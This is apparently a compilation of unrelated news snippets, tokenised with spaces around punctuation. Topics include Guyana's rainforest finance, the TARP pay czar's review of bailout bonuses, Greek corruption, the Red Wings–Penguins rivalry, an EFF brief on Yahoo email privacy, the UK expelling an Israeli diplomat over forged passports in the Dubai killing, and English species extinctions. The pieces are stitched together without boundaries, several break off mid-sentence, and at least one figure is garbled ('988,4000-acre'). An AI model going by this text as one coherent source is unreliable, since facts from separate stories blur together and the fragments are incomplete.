( 11/09/2009 ) Norway will provide up to $ 250 million to Guyana as part of the South American country ’s effort to avoid emissions from deforestation .
Roads are enablers of rainforest destruction
( 09/24/2009 ) Chainsaws , bulldozers , and fires are tools of rainforest destruction , but roads are enablers .
Roads link resources to markets , enabling loggers , farmers , ranchers , miners , and land speculators to convert remote forests into economic opportunities .
But the ecological cost is high : 95 percent of deforestation in the Brazilian Amazon occurs within 50 - kilometers of a road ; in Africa , where logging roads are rapidly expanding across the Congo basin , the bulk of bushmeat hunting occurs near roads .
In Laos and Sumatra , roads are opening last remnants of intact forests to logging , poaching , and plantation development .
But roads also cause subtler impacts , fragmenting habitats , altering microclimates , creating highways for invasive species , blocking movement of wildlife , and claiming animals as roadkill .
A new paper , published in Trends in Evolution and Ecology , reviews these and other impacts of roads on rainforests .
Its conclusions do n’t bode well for the future of forests .
REDD readiness plans for Panama , Guyana approved but rejected for Indonesia
( 07/02/2009 ) The World Bank ’s Forest Carbon Partnership Facility ( FCPF ) has approved REDD readiness plans ( R - Plans ) for Panama and Guyana , and rejected a plan for Indonesia , reports the U.N. and the Bank Information Center , an advocacy group .
Norway to pay Guyana to save its rainforests
( 02/05/2009 ) Norway will provide financial support for Guyana ’s ambitious plan to conserve its rainforests , reports the Guyana Chronicle .
Meeting in Oslo , Norway on Tuesday , Guyana President Bharrat Jagdeo and Norwegian Prime Minister Jens Stoltenberg signed a Memorandum of Understanding agreeing to establish a partnership to reduce greenhouse gas emissions from deforestation and forest degradation ( REDD ) .
The leaders will push for the incorporation of a REDD mechanism that includes low deforestation countries like Guyana in a post - 2012 climate change agreement .
14 countries win REDD funding to protect tropical forests
( 07/24/2008 ) Fourteen countries have been selected by the World Bank to receive funds for conserving their tropical forests under an innovative carbon finance scheme .
600 species of mushrooms discovered in Guyana
( 07/21/2008 )
In six plots of Guyanese rainforest , measuring only a hundred square meters each , scientists have discovered an astounding 1200 species of macrofungi , commonly known as mushrooms .
Even more surprising : they believe over 600 of these are new to science — that ’s equivalent to a new species every square meter .
Implementing a butterfly farm : Iwokrama reserve ’s latest sustainable initiative
( 07/20/2008 ) Iwokrama , which lies in the heart of Guyana ’s rainforest , is known worldwide for its innovative approach to preserving tropical rainforests and creating livelihoods for local communities .
Their focus has been to create programs that utilize the forest sustainably , allowing for a mutual benefit between the people and the forest itself .
Currently , Iwokrama has a number of initiatives under its umbrella , including eco-tourism , sustainable forestry , on - going research projects , and training programs .
Amid these bustling projects , a new one has emerged : butterfly farming .
Geology , climate links make Guiana Shield region particularly sensitive to change
( 06/14/2008 ) Soil and climate patterns in the Guiana Shield make the region particularly sensitive to environmental change , said a scientist speaking at a biology conference in Paramaribo , Suriname .
Private equity firm buys rights to ecosystem services of Guyana rainforest
( 03/27/2008 )
A private equity firm has purchased the rights to environmental services generated by 371,000 hectare rainforest reserve in Guyana .
Terms of the deal were not disclosed , but the agreement is precedent - setting in that a financial firm is betting that the services generated by a living rainforest — including rainfall generation , climate regulation , biodiversity maintenance and water storage — will eventually see compensation in international markets .
Guyana grants 1 million acres of Amazon rainforest to U.S. logging firm
( 01/09/2008 ) Guyana has awarded a 988,4000 - acre logging concession to a U.S. forestry company , reports the Associated Press .
Guyana ’s forests offered as massive carbon offset
( 11/26/2007 ) Guyana has offered up the entirity of its remaining forest cover as a giant carbon offset , reports The Independent .
Low deforestation countries to see least benefit from carbon trading
( 08/13/2007 ) Countries that have done the best job protecting their tropical forests stand to gain the least from proposed incentives to combat global warming through carbon offsets , warns a new study published in Tuesday in the journal Public Library of Science Biology ( PLoS ) .
The authors say that “ high forest cover with low rates of deforestation ” ( HFLD ) nations “ could become the most vulnerable targets for deforestation if the Kyoto Protocol and upcoming negotiations on carbon trading fail to include intact standing forest . ”
Gold mining in Guyana damages environment , threatens Amerindians
( 03/06/2007 ) Informal gold mining is causing environmental harm and human rights abuses in Guyana says a new report from the International Human Rights Clinic ( IHRC ) of Harvard Law School ’s Human Rights Program .
Wildcat gold mining has been a serious problem in the Guiana shield countries of Brazil , Venezuela , Guyana , Suriname and French Guiana .
Rising gold prices in recent years have only worsened the problem , as illegal miners have flooded the region clearing forest , polluting rivers , and making threats against indigenous people .
* Feinberg seeking data on top 25 earners at TARP firms
* Review includes companies that repaid taxpayer funds
* Will seek to renegotiate pay not in public interest ( Adds comments )
WASHINGTON / NEW YORK , March 22 ( Reuters ) - Obama administration pay czar Kenneth Feinberg plans to review past compensation at 419 companies that received bailout funds , including JPMorgan Chase JPM.N , Goldman Sachs GS.N , according to a source close to the U.S. Treasury Department .
Feinberg will look back at any pay for the top 25 earners that totaled more than $ 500,000 from October 2008 , when companies first received funds from the Troubled Asset Relief Program , though February 2009 , when legislation was passed attaching pay restrictions to the funds .
That period includes 2008 end - of - the - year bonus payments .
Feinberg will judge if any payments were contrary to the public interest and can request that individuals give money back .
But he cannot force such repayments , the source said , speaking anonymously because the letters will not go out to companies until Tuesday .
Also on Tuesday , Feinberg will issue his rulings for the pay packages of the top 25 earners at the five companies that have received exceptional taxpayer assistance and have not substantially repaid the funds .
Those companies are AIG AIG.N , General Motors [ GM.UL ] , GMAC , Chrysler and Chrysler Financial .
Feinberg ’s latest move to look back at pay is a bold expansion of his review of pay , and could send a signal that Wall Street cannot return to big bonus payments without intense public -- and governmental -- scrutiny .
Rose Marie Orens , a consultant with Compensation Advisory Partners , called the timing of Feinberg ’s letters “ peculiar . ”
“ What is it they are fishing for , ” said Orens , noting that many government agencies have requested compensation information from her financial clients .
“ I do n’t know any organizations that I ’m working with that accelerated compensation with any intent .
The performance was so bad .
It was what it was in 2008 . ”
Cornelius Hurley , director of the Morin Center for Banking and Financial Law at Boston University , thought Feinberg ’s look - back plans are better late than never .
“ If the notion was to see who had their hand in the cookie jar when the crisis was unfolding , then that should be revealed , ” Hurley said .
PAY CZAR’S POWER
President Barack Obama appointed Feinberg in June 2009 after public anger exploded over high pay at companies that received bailout money .
Feinberg , a Washington lawyer who previously oversaw the distribution of funds for victims of the attacks of Sept. 11 , 2001 , said last August that the law gave him wide authority to attempt to recoup money paid to employees at companies that received TARP money .
He has not yet tried to use such powers .
Public discontent has continued to simmer as Wall Street profits and bonuses bounced back in 2009 .
The New York State comptroller released a report last month showing that bonuses on Wall Street rose 17 percent last year to $ 20.3 billion .
Representatives from Goldman Sachs , JPMorgan and Morgan Stanley MS.N declined to comment about the letters set to go out on Tuesday .
The 419 companies that will receive letters will have 30 days to give Feinberg the pay data , the source said .
The threshold was set at $ 500,000 to reduce the administrative burden on smaller recipients of TARP funds .
The source did not elaborate on how the pay czar ’s office will determine if a payment was not in the public interest , but said the office will be looking at the size of the pay packages , the mix of cash and stock , and the circumstances of the payments .
Feinberg will try to renegotiate any payments deemed excessive , but has no power to file a lawsuit or issue a subpoena seeking repayment , the source said .
However , public exposure can be a powerful tool , as indicated by the slow but largely successful repayment of retention bonuses to former employees of AIG ’s Financial Products unit .
Wall Street might be immune to shame , said Russell Roberts , an economics professor at George Mason University and research fellow at Stanford University ’s Hoover Institution .
“ If the goal is to shame executives , there is not much shame on Wall Street , and I doubt it would have much effect if that is his only lever , ” Roberts said .
( Reporting by Karey Wutkowski in Washington and Steve Eder in New York ; Additional reporting by Jonathan Stempel in New York .
editing by Leslie Gevirtz , Maureen Bavdek and Steve Orlofsky )
ATHENS — Behind the budget crisis roiling Greece lies a riddle :
Why does the state spend so lavishly but collect taxes so poorly ?
Many Greeks say the answer needs only two words : fakelaki and rousfeti .
Fakelaki is the Greek for " little envelopes , " the bribes that affect everyone from hospital patients to fishmongers .
Rousfeti means expensive political favors , which pervade everything from hiring teachers to property deals with Greek Orthodox monks .
Together , these traditions of corruption and cronyism have produced a state that ...
TV debate : who do you think won ?
Gordon Brown , David Cameron and Nick Clegg took part in the third leaders ' debate tonight .
Who do you think came out top ?
Over on Ryan Adams ' website , the alt - country vet has a fun little piece of news : " We 're going to begin pressing ORION -- my most legit METAL record -- on vinyl next week .
Have a listen to the song below and let us at PAXAM [ Adams ' label ] know if you'd be interested in purchasing one . "
The " legit " qualifier is in there presumably because Ryan has played around with joke metal before , primarily through his goofy web - only Werewolph side project .
But the song streaming at Adams ' site does indeed sound fairly serious , though it probably tilts more toward messy late - 80s Pacific Northwest proto - grunge than toward actual metal .
There 's no soloing , no bottom - heavy riffage , and no lyrics about dragons , but Adams ' scratchy growl / whine is pretty impressive .
( The Soundcloud tag seems to indicate that the song is called " Electrosnake " , which does push us a little further back into " joke " territory . )
Over on the site , there 's also a poll where fans can vote on whether or not they 'd buy the record .
Whatever our intentions , we should all probably vote " yes , " if only because the world 's a slightly more interesting place when Adams is pulling unabashedly ridiculous moves like this one .
Click below to hear the stream of that new " metal " song .
Light wallets are not a problem for Joe Mangrum , a sidewalk sand painter in New York , who has been using Square to take donations from passers - by and sell copies of his book .
Sales have increased sharply since he started accepting credit cards on his iPhone , he said .
“ I ’ve made the sale as opposed to twiddling my thumbs because they do n’t have the cash . ”
The new services could have the biggest impact on the smallest businesses , like farm stands or house cleaners , that accept only cash and checks because they do not have stores to house credit card terminals and do not want to enter into complicated , long - term relationships with credit card companies .
Rachel Ancliffe , a clothing designer in Portland , Ore. , sells her dresses and blouses at sample sales and from her home , and uses Intuit GoPayment to process credit card payments .
“ You ca n’t accept checks because then you ’re just kissing your product goodbye ” because of fraud and bounced checks , Ms. Ancliffe said .
“ I sell 10 times more because I take credit cards . ”
Fraud protection offered by the credit card companies is the same as when the card is used at a cash register .
Some of the new companies say security against fraud might even be improved because they provide e-mail receipts , and those from Square include photos and a map of where the transactions were made .
Image Brian Kusler and Nina Ramos , in San Francisco , using phones to exchange money .
Credit ... Jim Wilson / The New York Times
The death of cash has been predicted since the 1970s , when electronic transactions like direct deposit of checks were introduced .
But most digital payment experiments , like one in 2006 by Visa , have focused on swiping cellphones , as is popular in countries like Japan , instead of credit cards .
Mobile payments have not taken off in the United States because Americans are just as happy to reach into their pockets for a plastic card as for a cellphone .
Vonage has announced the release of their new Android application for T - Mobile and AT&T customers .
Starting immediately , users can download the free app and enjoy free domestic WiFi calling as well as outbound international calling at discounted rates .
“ We are focused on ensuring that our customers can enjoy all the benefits of their Vonage service from any location using any device that can access the Internet , ” said Michael Tempora , senior vice president of product management .
“ We will continue to expand our offerings in 2010 to include a robust set of voice and messaging services that utilize Wi-Fi and 3G wireless networks . ”
Features of Vonage Mobile include :
UNLIMITED calling to more than 60 countries for only $ 24.99 / month †
Dial directly from your existing address book contacts without calling cards or PIN codes
Works with your existing mobile phone and current rate plan ‡
Plus , make unlimited local and long distance calls over WiFi * when you ’re abroad using mobile VOIP , without wasting cell minutes
Aura is a application to track and monitor your characters for EVE Online ( http://eve-online.com).
Version : 1.3.7
Please join the in - game channel ( Aideron Robotics ) or visit the Aura
forum for support or posting feedback ( I do not read market comments ) :
http://www.aideronrobotics.com/forum.
You can also follow me on Google + ( http://profiles.google.com/jparksbrokeit) or Twitter ( @aideronrobotics ) .
Send your ISK donations to Marcel Devereux .
i Phone related for Aura for EVE Online
Aura for EVE Online was developed for Android by Jason Parks
Package name : com.aideronrobotics.android.aura
System permissions : 5
Click here to show / hide list
android.permission.ACCESS_NETWORK_STATE
android.permission.INTERNET
android.permission.VIBRATE
android.permission .WRITE_EXTERNAL_STORAGE
com.android.vending .BILLING
I am the developer of this Application !
was developed for Android byPackage name : System permissions :
Screenshot (s ) available for Aura for EVE Online
Discussion(s ) about Aura for EVE
Online in our forum
Comments and Ratings for Aura for EVE Online
All 5 stars 4 stars 3 stars 2 stars 1 star
Filters :
Mrs Martin said : “ She called another woman over and she said it was company policy that because my daughter had put the scissors on the counter it called into question whether she would be supervised using them .
Nature Bags are handmade for everyday use , including unique lines of reusable shopping bags , purses , diaper bags , produce bags , and more .
They are one of the planet 's only genuine zero - waste , Earth - friendly , carbon - neutral reusable bags .
Each bag is homemade by indigenous Khmu artisans in remote villages in northern Laos .
They are constructed using fiber from a vine that grows without cultivation , irrigation , or chemicals .
These sustainable , plastic - free , cotton - free bags are truly the most eco-friendly bags on Earth .
Police Use Entire Academy Class to Find Officer ’s Wallet
If you ever got the impression that sometimes police take crimes committed against them more seriously than others , it seems you ’re right .
After a Lakewood , WA PD officer ’s unmarked cruiser was broken into , and his wallet stolen , the police realized that they had to act .
And so they did .
“ With the assistance of an entire police academy class , maintenance workers and three detectives , the Lakewood police badge , credit cars and other wallet content belonging to ( the officer ) were located ”
It ’s unclear exactly how many officers were involved , however it is clear that vastly more resources ( and tax dollars ) were spent recovering this wallet than would ever be spent looking for yours .
Is this appropriate ?
Is it ethical ?
I would submit that this happens all the time , in matters large and small and it ’s completely unethical to spend precious limited resources protecting and serving one group ( cops ) more than the rest of us who write their pay checks .
DETROIT -- Detroit Red Wings coach Mike Babcock called it “ good entertainment . ’’
Forward Todd Bertuzzi said it was “ cool . ’’
The Red Wings liked the feistiness goaltender Jimmy Howard displayed after the final horn Monday , when he rushed to teammate Henrik Zetterberg ’s defense and began roughing it up with Pittsburgh Penguins superstar Sidney Crosby following
at Joe Louis Arena .
“ Just helping out a teammate , that ’s all , ’’ Howard said .
“ It ’s become quite the rivalry , and we stick together out there . ’’
Crosby cross-checked and slashed Zetterberg several times in front of the Red Wings net , triggering a melee .
First , Bertuzzi stepped in and gave Crosby a face wash , and then Howard got involved .
“ He does that stuff all the time .
Somehow he gets away with it , ’’ Howard said .
“ Z does n’t take any of that .
He went right back at him , and I stepped in there , too . ’’
Said Zetterberg : “ I saw Jimmy coming in with his glove and Crosby was n’t there anymore . ’’
Crosby maintains Howard had no business being involved .
“ I do n’t know what he was doing , ’’ Crosby said .
“ It was one of those things , a couple guys battling at the end .
I knew the linesman was in there .
I do n’t know whether ( Howard ) wanted a free shot , but I do n’t think it was any place for him to be . ’’
Howard ’s teammates got a kick out it , though .
“ I like that out of him , it was pretty cool , ’’ Bertuzzi said .
“ Jimmy ’s aggressive . ’’
Zetterberg and Crosby have a history dating to the 2008 Stanley Cup finals , when Crosby went after Zetterberg following the final horn in Game 4 .
“ I do n’t know if he gets away with it , ’’ Zetterberg said .
“ He plays with a lot of emotion , a lot of heart .
Sometimes , it comes out the wrong way . ’’
Zetterberg said of the cross-checks : “ I might be doing the same thing if ( the score ) were the other way . ’’
Babcock said he liked the way his players rushed to Zetterberg ’s defense .
“ I know Sid now pretty good .
He ’s a competitive , competitive guy and he wants to win that matchup , ’’ Babcock said .
“ Good players like playing against good players and beating good players . ’’
Said Penguins goalie Marc - Andre Fleury : “ It ’s fun and it ’s good for hockey to watch these two guys go at it like that . ’’
Crosby hears it from fans
Crosby , the player Detroit fans love to hate more than any other , was booed every time he touched the puck .
Fans chanted “ Crosby sucks ! ’’ several times as well .
Crosby joked about it while sitting beside Red Wings legend Gordie Howe in the dressing room as they shared some laughs .
“ Never heard it before in this building -- never surprised , but maybe surprised to hear it here , ’’ Crosby said .
“ First time since five years ago that I heard it here . ”
Said Zetterberg of the atmosphere : “ This is the way we like it .
It ’s loud .
Every time we go on the ice , the crowd is with you and helping a lot .
It was like a playoff game and it was fun to play . ’’
Notable , quotable
Howard on the rivalry with the Penguins : “ ( The game ) was a little bit more special considering who it was .
It ’s turned into a heated rivalry .
I was n’t participating ( in the last two Cup finals ) , but I was right there on the sidelines watching .
Just being there , you got a sense of the rivalry . ’’
Bertuzzi : “ That ’s what you want , rivalries like that .
It happens to be an Eastern ( rival ) , which is nice , a little bit of change compared to playing the Western ones all the time . ’’
Penguins coach Dan Bylsma , a native of Grand Haven : “ You ’ve got to give credit to the Red Wings the way they played .
They battled .
...
They were a desperate team .
I think our level , as far as desperation , needs to go up . ”
Mike “ Doc ’ ’ Emrick , working play - by - play for Versus , called his 3,000th game .
The Michigan native received a nice ovation after the milestone was acknowledged to the crowd in the third period .
Telders and the crew left about an hour ago on the helicopters .
They got the Array up and running , but it started buzzing like mad just after they left .
Figures .
I ’ll have to try to fix it tomorrow before the first experiment .
I do n’t think I can deal with that noise for the next 6 months .
It looks like the Husky has found a warm place under the server rack .
He ’s snoozing quietly next to his bowl .
I should find a name for him .
Antarctica is cold .
This article is from the archive of our partner .
Just because health care reform is about to become law does n't mean the political fight is over .
Politicians are bound to wrangle over the new law for years .
Part of that is the Republican campaign to repeal the legislation .
Calls for repeal are already coming from the Weekly Standard and National Review , not to mention some GOP lawmakers .
Running against health care reform in 2010 political campaigns is one thing .
But could Republicans really repeal the laws established by health care reform ?
Here are some key reasons they might not be able to :
Insurance Regulations Too Popular to Repeal Former Bush speechwriter David Frum concedes , " No illusions please :
This bill will not be repealed .
Even if Republicans scored a 1994 style landslide in November , how many votes could we muster to re-open the ' doughnut hole ' and charge seniors more for prescription drugs ?
How many votes to re-allow insurers to rescind policies when they discover a pre-existing condition ?
How many votes to banish 25 year olds from their parents ’ insurance coverage ?
And even if the votes were there – would President Obama sign such a repeal ? "
Requires ' Literally ' Impossible Senate Majority Matthew Yglesias laughs and laughs .
" With repealing health reform the right - wing fetish point of the day , it ’s worth observing that it ’s literally not possible for Republicans to win enough Senate seats in 2010 to pass anything over Barack Obama ’s veto . "
That would require the GOP hold 67 Senate seats , but even if they won every single election this could n't happen before 2012 .
But We Can't Wait For Republican President Conservative blogger Ed Morrissey says that even if Obama loses reelection in 2012 , which he admits is unlikely , by 2013 the reforms will just be too entrenched .
" If we rely on repeal in 2013 , it ’s going to be something very close to too late . "
He says the effects of reform will make " market - based reforms " favored by the GOP too difficult , that entitlements will be too popular , and that the process of repeal would be " too ugly " anyway .
Siding With Insurers ?
Pure Political Poison
The New Yorker 's James Surowiecki warns that a repeal " will mean , literally , voting for allowing insurance companies to deny coverage to people with pre-existing conditions , voting to permit rescissions , and voting to make it much harder for people who lose their jobs to stay insured .
I have a hard time believing that advocating these things will be a political winner . "
What Does Repeal Even Target ?
The Atlantic 's Marc Ambinder shrugs , " But what to repeal ?
The ' bad ' stuff -- tax increases and such -- kick in later .
Most everyone who will feel reform 's touch within the next year or so will get benefits , be it in the form of not having their coverage rescinded , or be it a $ 250 rebate check from the government . "
Repealing those benefits would be enormously unpopular .
But repealing the delayed cost - control measures would dramatically increase the cost of health care reform and balloon the deficit , to which Republicans are opposed .
Would Narrow Republican Coalition
The Economist cautions that a repeal campaign might be " good for riling up the people who are already furious — and a likely turn - off for everyone else . "
It would thrill a small number of highly motivated Republicans , but it would n't win over a new majority , which is exactly what they 'd need to actually repeal it .
Entitlements Are Just Too Popular
The Atlantic 's Megan McArdle sighs , " The reason entitlements are hard to repeal is that the Republicans care about getting re-elected .
If they did n't -- if they were willing to undertake this sort of suicide mission -- then the legislative lock - in you 're counting on would n't exist . "
This article is from the archive of our partner The Wire .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
Denver - The Electronic Frontier Foundation ( EFF ) along with Google and numerous other public interest organizations and Internet industry associations joined with Yahoo !
in asking a federal court Tuesday to block a government attempt to access the contents of a Yahoo !
email account without a search warrant based on probable cause .
The Department of Justice is seeking the emails as part of a case that is under seal , and the account holder has apparently not been notified of the request .
Government investigators maintain that because the Yahoo !
email has been accessed by the user , it is no longer in " electronic storage " under the Stored Communications Act ( SCA ) and therefore does not require a warrant , even though that same legal theory has been flatly rejected by the one Circuit Court to address it .
Yahoo ! is challenging the government request before a federal magistrate judge in Denver , arguing that the SCA and Fourth Amendment require the government to get a search warrant before compelling Yahoo ! to disclose the email .
In an amicus brief filed in support of Yahoo !
Tuesday , EFF says that the company is simply following the law and protecting the constitutional privacy rights of its customers .
" The government is trying to evade federal privacy law and the Constitution , " said EFF Senior Staff Attorney Kevin Bankston .
" The Fourth Amendment protects these stored emails , just like it does our private papers .
We all have a reasonable expectation of privacy in the contents of our email accounts , and the government should have to make a showing of probable cause to a judge before it rifles through our private communications . "
This email privacy case comes on the heels of the announcement of a broad coalition of technology companies , think tanks , academics , and privacy groups -- including EFF -- that is calling for amendments to clarify and strengthen federal privacy law to preserve traditional privacy rights in the face of rapidly changing technology .
The Digital Due Process coalition 's recommendations would , among other things , clarify that the government must get a warrant before obtaining stored email messages , regardless of whether they are opened or unopened and regardless of their age .
" Americans trust Internet service providers and other technology companies to collect and store large amounts of personal information -- more and more every day -- and it's time that Congress clarified and strengthened the law to better protect that data , " said EFF Civil Liberties Director Jennifer Granick .
" Just as your postal letters and packages are private even though the carrier could open them , so your email and other information is protected even if it is stored on a third party 's server . "
Along with Google , other signers to the EFF brief are the Center for Democracy & Technology ( CDT ) , the Center for Financial Privacy and Human Rights ( CFPHR ) , the Competitive Enterprise Institute ( CEI ) , the Computer & Communications Industry Association ( CCIA ) , the Distributed Computing Industry Association ( DCIA ) , NetCoalition , the Progress & Freedom Foundation ( PFF ) and TRUSTe .
Signers were represented by EFF , Professor Paul Ohm of the University of Colorado at Boulder and the Samuelson - Glushko Technology Law & Policy Clinic , and attorney Matthew M. Linton of the firm Kennedy Childs & Fogg , P.C. , in Denver .
For the full amicus brief :
http://www.eff.org/files/filenode/inreusaorder18/AmiciBriefYahooEmails.pdf
For more on this case :
http://www.eff.org/cases/re-application-united-states-america-order
For more on Digital Due Process :
http://www.digitaldueprocess.org
Contacts :
Kevin Bankston
Senior Staff Attorney
Electronic Frontier Foundation
bankston@eff.org
Jennifer Stisa Granick
Civil Liberties Director
Electronic Frontier Foundation
jennifer@eff.org
Systemics !
I think this is due to be seen by many others .
Spread this across the net !
I think Reddit is hungry …
See More Posts About : Christians
Jews
Religion
Foreign secretary confirms Britain has demanded withdrawal of Israeli diplomat following ' intolerable ' use of identity papers
This article is more than 10 years old
This article is more than 10 years old
David Miliband said today that there was " compelling evidence " that Israel was responsible for misuse of British passports as part of a plot to kill a prominent member of Hamas .
The foreign secretary confirmed that Britain had demanded the withdrawal of an Israeli diplomat following the " intolerable " use of 12 forged British passports by a hit squad that killed the founder of Hamas 's military wing in Dubai .
Miliband attacked the " profound disregard " for UK sovereignty and said the apparent involvement of a friendly nation " added insult to injury " .
Israel 's ambassador to London , Ron Prosor , said he was " disappointed by the decision of the British government " , but pledged that the two countries would retain close ties .
" The relationship between Israel and the United Kingdom is of mutual importance , " he said .
Miliband 's statement will be seen around the world as the first definitive allegation from a western government of Israeli responsibility for the murder of Mahmoud al - Mabhouh in a Dubai hotel in January .
Today 's developments follow an inquiry by the Serious and Organised Crime Agency ( Soca ) .
Mliband said inquiries were still under way in other countries and that it would not be appropriate for " legal and other reasons " to release the Soca report in full .
But he said that , given the quality of the forgeries , it was " highly likely " that they were made by a state intelligence service .
" This , together with other enquiries , and the links to Israel established by Soca , [ means ] we have concluded that there are compelling reasons to believe that Israel was responsible for the misuse of British passports , " Miliband told MPs in a statement this afternoon .
Miliband said the UK government took the matter extremely seriously and had written to the Israeli administration seeking assurances that such misuse would never happen again .
The misuse of UK passports not only presented a hazard to British nationals in the region but also represented a " profound disregard " for the sovereignty of the United Kingdom , the foreign secretary said .
" The fact that this was done by a country that is a friend with significant diplomatic , cultural , business and personal ties to the UK only adds insult to injury .
No country or government could stand by in such a situation . "
Miliband told MPs that the Soca report had been studied by the prime minister and was presented to the cabinet earlier today .
Soca had conducted an " extremely professional " investigation and all requests had been met by the Israeli authorities , he said .
The evidence showed beyond " any doubt " that none of the 12 British citizens involved were anything other than wholly innocent victims of identity theft , the foreign secretary added .
Biometric passports that would be considerably more difficult to counterfeit have now been issued to all but one of the British citizens , he added .
Miliband also said the Foreign Office 's travel advice for Israel would be amended to highlight the risk of papers being cloned , and how that could be minimised .
A total of 12 British passports are alleged to have been forged .
An initial six had the names of Michael Barney , James Clarke , Stephen Hodes , Jonathan Louis Graham , Paul John Keeley and Melvyn Mildiner .
Last month , Dubai identified the use of a further six fake British passports with the names of Mark Daniel Sklar , Roy Allan Cannon , Daniel Marc Schnur , Philip Carr , Stephen Keith Drake and Gabriella Barney .
A Foreign Office spokesman said the government believed their passport details had been used fraudulently .
Other members of the hit squad travelled on fake Irish , French and Australian travel documents , Dubai police said .
At least 15 of the suspected killers share names with Israeli citizens , fuelling suspicions that the Mossad was behind the hit .
Interpol has published a wanted list of 27 people in connection with the killing .
Miliband stressed today " in the strongest possible terms " that the UK had no advance knowledge of the assassination and no involvement whatsoever in the killings .
The expelled official is not being accused of direct personal involvement , officials said earlier today .
The unusual step is intended as a gesture to reflect British anger .
Al - Mabhouh , who established Hamas 's military wing , was assassinated in his luxury hotel room in Dubai on 19 January by a team of killers wearing fake beards , wigs and other disguises .
Dubai officials said they were " 99 % certain " that Mossad agents were behind the murder , but Israel has refused to confirm or deny the link .
At the time Miliband branded the abuse of British passports " outrageous " and demanded that Tel Aviv cooperate fully with the UK 's investigation .
Prosor was summoned to the Foreign Office last month to discuss the situation , but he flatly denied there was any " additional information " to give .
In 1986 , a Mossad agent left an Israeli embassy envelope containing eight forged British passports in a German telephone box .
Israeli diplomats were only expelled a year later after a Palestinian working as an Israeli double agent was found with a cache of weapons in Hull .
Margaret Thatcher also closed down the Mossad 's London base .
More than two animals and plants a year are becoming extinct in England and hundreds more are severely threatened , a report published today reveals .
Natural England , the government 's agency responsible for the countryside , said the biggest national study of threats to biodiversity found nearly 500 species that had died out in England , all but a dozen in the last two centuries .
The losses recorded compare with a natural rate of about one extinction every 20 years before humans dominated the planet , but are almost certainly an underestimate because of poor records of any but the " biggest , scariest " creatures before the 1800s .
The high rate at which species are being lost is set to continue .
Almost 1,000 other species face " severe " threats from the same problems that drove their relatives extinct – hunting , pollution , development , poor land management , invasive species and , more recently , climate change – says the report , Lost life : England 's lost and threatened species .
This represents about a quarter of all species in the best - studied groups , including every reptile , dolphin and whale species , two - thirds of amphibians and one - third of butterflies and bumblebees .
In total , the report records 55,000 known species in England .
" Each species has a role and , like the rivets in an aeroplane , the overall structure of our environment is weakened each time a single species is lost , " said Helen Phillips , the agency 's chief executive .
" We seem to have endless capacity to get engaged about rainforests but this reminds us conservation begins at home . "
Tom Tew , Natural England 's chief scientist , called for a " step change " in conservation , including more " targeted " schemes to protect individual species , better safeguarding of protected areas and better management of land outside the protected areas , especially farmland .
" This report is not all doom and gloom , but we 're losing species at an alarming rate and many of our species are seriously threatened , " he said .
" These species could the tip of the iceberg unless we take action . "
Matt Shardlow , head of Buglife , said : " The report [ confirms ] we are in the midst of an extinction crisis and it is happening here in England under our very noses . "
Dozens of scientists trawled records going back to the first century AD from official lists and books .
They identified 492 species recorded in England that could no longer be found , all but 12 of which disappeared after 1800 .
A further 943 species are listed under the UK's Biodiversity Action Plan ( BAP ) as plants and animals under threat .
These include a number of species now extinct in many counties or regions of England .
One statistic that shocked the experts was a study of nearly half of English counties , which showed one plant species going locally extinct every two years .
So widespread are the problems that some once prolific species are under threat , including the common toad , common frog , common skate and the corncrake .
" They are not common any more , " said Tew .
" Our ancestors used to lie awake at night unable to sleep because of the noise of the corncrake . "
Four of the species extinct in England also became extinct globally : the penguin - like great auk ; Mitten 's beardless moss ;
York groundsel , a weed only discovered in the 1970s ; and the Ivell 's sea anemone , last seen in a lagoon near Chichester .
Many more English animals and plants are also on the threatened list , including the whitebeam , a tree with young leaves like " white candles " , said Tew : " That signals the start of spring ; it can be found nowhere else in the world and has disappeared from much of England . "
The remaining extinct and threatened species exist in other countries , though the agency warned that reintroducing species was not reliable because the threats still remained , and national or regional extinctions led to the loss of genetic diversity .
Last year Natural England also published a report highlighting the economic cost of not protecting natural ecosystem services such as clean air , clean water , productive soils for crops , carbon storage , flood defence and natural resilience to climate change .
Other benefits were beyond value , said Tew : " Lots of you , like me , feel the worse for not hearing the corncrake in the country , or the flash of a red squirrel .
When we lose wildlife we lose something priceless , and that effects our quality of life . "
The report calls for better conservation , especially following successful schemes to reintroduce or bolster populations such as the red kite and large blue butterfly .
Of the hundreds of species on the BAP list in the 1990s , seven have since become extinct but 45 % are now stable or recovering .
The government has also ordered a review of protected areas .
" Species loss is not inevitable ; we can do something about it , " added Tew .
" But we need to think ambitiously if we 're to meet the needs of this and future generations . "
This week , Simon Stuart , who oversees the team of experts that declare species globally threatened and extinct , said humans were causing extinctions faster than new species could evolve for the first time since the dinosaurs disappeared .
Winners and losers
Going : Species facing " severe " threats in England
Red squirrel
Northern bluefin tuna
Natterjack toad
Common skate
Alpine foxtail
Kittiwake
Grey plover
Shrill carder bumblebee
Recovering : Recent conservation success stories
Pole cat
Large blue butterfly
Red kite
Ladybird spider
Pink meadowcap
Sand lizard
Pool frog
Bittern
Caroline Gay Welch passed away peacefully at home on July 17 , 2008 , after a year - long bout with ovarian cancer .
Her life was distinguished by quiet service to her community , including work for the Fremont Public Association and the Community House Mental Health Center in Seattle , Washington .
Speaking out openly about her medical use of marijuana marked a rare instance of willingness to be publicly recognized for her efforts on behalf of others .
With the help of Caroline ’s friends and family , the American Civil Liberties Union of Washington was able to donate 364 copies of the Marijuana :
It ’s Time for a Conversation DVD to public libraries throughout Washington .
Thank you , Caroline , for sharing your story .
Microsoft has acted swiftly after the Web site Cryptome leaked its " Global Criminal Compliance Handbook . "
The guide does exactly what it says : outlines the surveillance services the software company will perform for law enforcement agencies on its online platforms .
These include its email services , such as Hotmail , MSN , Messenger , Office Live , Windows Live , and even Xbox Live .
Gulp .
The 22 - page guide has " Confidential For Law Enforcement Use Only " stamped all over it , but that did n't stop the website from putting the PDF up over the weekend .
Cryptome Editor John
Young received an notice from the site 's host , Network Solutions yesterday , citing the Digital Millennium Copyright Act .
Unless he removes the guide , they fingerwagged , Cryptome will be disabled tomorrow , February 25 .
( Update : the Cryptome.org website is already showing a " currently unavailable " message from Network Solutions . )
Young is most incensed by " its improper use of copyright to conceal from its customer violations of trust towards its customers , " he told the Geekosystem Web site .
He added that Microsoft was " repugnant " in the way it was allowing the law enforcement agencies to grab its clients ' data .
" This information would also be equally useful to customers to protect themselves when Microsoft cannot , due to its legal obligations under CALEA . "
